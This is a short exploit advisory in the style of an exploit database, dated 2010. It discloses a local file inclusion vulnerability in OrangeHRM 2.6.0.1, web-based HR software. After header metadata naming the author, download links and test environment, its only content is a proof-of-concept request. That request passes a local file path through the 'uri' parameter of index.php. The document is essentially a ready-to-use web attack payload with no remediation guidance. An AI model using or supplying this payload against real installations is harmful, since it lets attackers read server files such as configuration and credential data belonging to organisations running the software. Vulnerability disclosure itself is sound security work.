# Exploit Title: OrangeHRM 2.6.0.1 Local File Inclusion Vulnerability # Date: 11-10-2010 # Author: ZonTa # Mail: zontahackers[at]gmail[dot]com # Software Link: http://www.orangehrm.com/product-download.php?type=stable-zip http://sourceforge.net/projects/orangehrm/files/stable/2.6/orangehrm-2.6.0.1.zip/download # Category: webapps # Version: 2.6.0.1 # Tested on: Apache,PHP5 ------------------------------------------------------------------------------------------------------------------- POC http://localhost/orangehrm/index.php?uniqcode=KPI&menu_no_top=performance&uri=[local-file] ---------------------------------------------------- END ----------------------------------------------------------